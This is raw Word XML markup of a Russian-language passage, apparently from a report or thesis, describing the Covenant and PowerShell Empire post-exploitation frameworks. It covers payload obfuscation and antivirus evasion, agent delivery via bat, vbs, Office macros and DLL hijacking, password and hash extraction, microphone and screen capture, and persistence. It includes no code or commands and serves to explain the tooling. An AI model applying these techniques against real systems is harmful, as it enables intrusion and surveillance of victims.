    <w:p w14:paraId="220AD11F" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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67E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Encrypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Exchange - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> реализует зашифрованный обмен ключами между зараженными узлами и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, который в значительной степени основан на аналогичном обмене в проекте Empire, в дополнение к дополнительному SSL-шифрованию. Это обеспечивает крип</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тографическое свойство прямой секретности между скомпрометированными узлами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43483258" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Динамическая компиляция — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> использует API </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Roslyn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для динамической компиляции C#. Каждый раз, когда подключается новый узел или назначается новая задача, соответствующий ко</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">д </w:t>
      </w:r>
      <w:r w:rsidRPr="00567E5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перекомпилируется и запутывается с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ConfuserEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, избегая полностью статических полезных нагрузок. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31B364" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Встроенное выполнение C# - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> заимствует код и идеи из проектов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SharpGen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50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567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SharpShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, чтобы позволить операторам выполнять однострочные модули</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> C# на зараженных узлах. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134EF23C" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отслеживание маяков - Ковенант отслеживает маяки на протяжении всей операции и обобщает их в меню Индикаторы. Это позволяет оператору выполнять действия, которые отслеживаются на протяжении всей операции, и легко передавать эти де</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>йствия синей команде во время проведения операции или в конце для оценки и устранения уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B305FB0" w14:textId="2C249AAF" w:rsidR="002A3235" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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ind w:left="709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разработано на C# - весь проект написан на одном языке, что позволяет достаточно легко его собрать из исходных файлов.</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E5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79D39E81" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00567E5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.3.2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PowerShell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Empire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B239CE" w14:textId="77777777" w:rsidR="00567E50" w:rsidRDefault="00EE7791" w:rsidP="00D91D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Популярный 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гент пост-эксплуатации, предоставляющий возможность запускать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PowerShell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агенты без необходимости использования powershell.exe, с быстрым запуском пост-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эксплутационных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модулеи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̆, которые варьируются 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кейлоггеров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дамперов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NTLM, и позволяет успешно избе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гать сетевое обнаружение, при этом весь этот функционал собран в одном удобном и гибком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фреймворке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74A436" w14:textId="71F4014F" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D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Powershell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Empire предоставляет модульную платформу для пост-эксплуатации, используя возможности средства автоматизации ОС Windows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PowerShell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67E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Empire агент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 полностью работают в оперативной памяти и их сложно обнаруживать средствами защиты,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т.е.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антивирусным ПО и системами предотвращения вторжений из-за того, что они написаны на скриптовом языке и во время выполнения между агентом и антивирусным ПО стоит инт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ерпретатор скриптового языка, в отличие от классических </w:t>
      </w:r>
      <w:r w:rsidR="007F03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payloaders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скомпилированных в ассемблер и исполняемый файл. Данный фреймворк активно используется как для пост-эксплуатации в Windows системах, так и при создании фишинговых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кампаний.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Powershell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Empir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 работает в Linux среде и по своей структуре напоминает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Metasploit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Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC9472" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D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 не менее стоит отметить, что Empire в значительной степени полагается на работу нескольких других проектов для своей базовой функциональности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA60F9D" w14:textId="77777777" w:rsidR="00567E50" w:rsidRDefault="00EE7791" w:rsidP="00D91D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работы с удаленным узлом,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работающим под операционной системой Windows необходимо загрузить на нее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являющийся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обфусцированным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кодом для запуска. После исполнения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стартует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PowerShell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агент, с помощью которого происходит взаимодействие с атакованной системой.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Способы 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агрузки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могут различаться — от фишинговых атак, до компрометации системы с помощью известных и не исправленных уязвимостей в ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330327BC" w14:textId="77777777" w:rsidR="00567E50" w:rsidRDefault="00EE7791" w:rsidP="00567E50">
      <w:p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Агенты могут быть представлены в следующем виде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEE589" w14:textId="77777777" w:rsidR="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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67E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>launcher_bat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – агент доставляется при запуске </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-файла;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C518E59" w14:textId="77777777" w:rsidR="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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67E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>launcher_vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – агент доставляется при выполнении </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-скрипта;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301891B6" w14:textId="77777777" w:rsidR="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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67E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>macro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – код макроса для внедрения в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>офсиные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> документы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FB39D" w14:textId="287F20C3" w:rsidR="002A3235" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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67E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – запуск агента в виде «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hijacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»- внедрение в процесс DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2900C" w14:textId="30E70B26" w:rsidR="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="9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tager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позволяет интегрировать Empire с фреймворком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Metasploit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д</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ругими современными инструментами. При помощи эксплойта требуется провести инъекцию вредоносной DLL в атакованный процесс, после чего произойдет загрузка Empire агента в оперативную память</w:t>
      </w:r>
      <w:r w:rsidR="00D91D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скомпрометированного узла и его дальнейшее выполнение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A3F8F" w14:textId="1A1B98D3" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="9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осо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бенности, которые необходимо отметить — это готовые средства для взаимодействия с атакованной системой под управлением Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5539F" w14:textId="1A0C4DB8" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00D91D23" w:rsidP="00D91D23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EE7791">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нтеграция с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE7791">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE7791">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B85F292" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23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в направлении повышения привилегий;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE5B72" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRDefault="00EE7791" w:rsidP="007F03E4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разведка - сбор информации об атакованной системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и ее окружении, а также вывод полученных данных;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F7358" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRDefault="00EE7791" w:rsidP="007F03E4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03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запись звука с интегрированного микрофона;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9FE36" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRDefault="00EE7791" w:rsidP="007F03E4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03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>сохранение скриншотов;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E2DCE" w14:textId="754703E2" w:rsidR="002A3235" w:rsidRPr="007F03E4" w:rsidRDefault="00EE7791" w:rsidP="007F03E4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03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">извлечение Windows паролей и </w:t>
      </w:r>
      <w:r w:rsidR="007F03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="007F03E4" w:rsidRPr="007F03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007F03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>значений</w:t>
      </w:r>
      <w:r w:rsidRPr="007F03E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1700A8F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>акрепление в системе.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251D7CF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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D0DB18" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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71F8B9" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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5F82E2" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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2D0259" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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C0000D" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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CEC5E4" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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8AAD80" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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2EA9BE" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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32B83D" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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D2D5C7" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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5FF00F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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895534" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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967925" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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B23E56" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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0E1E11" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
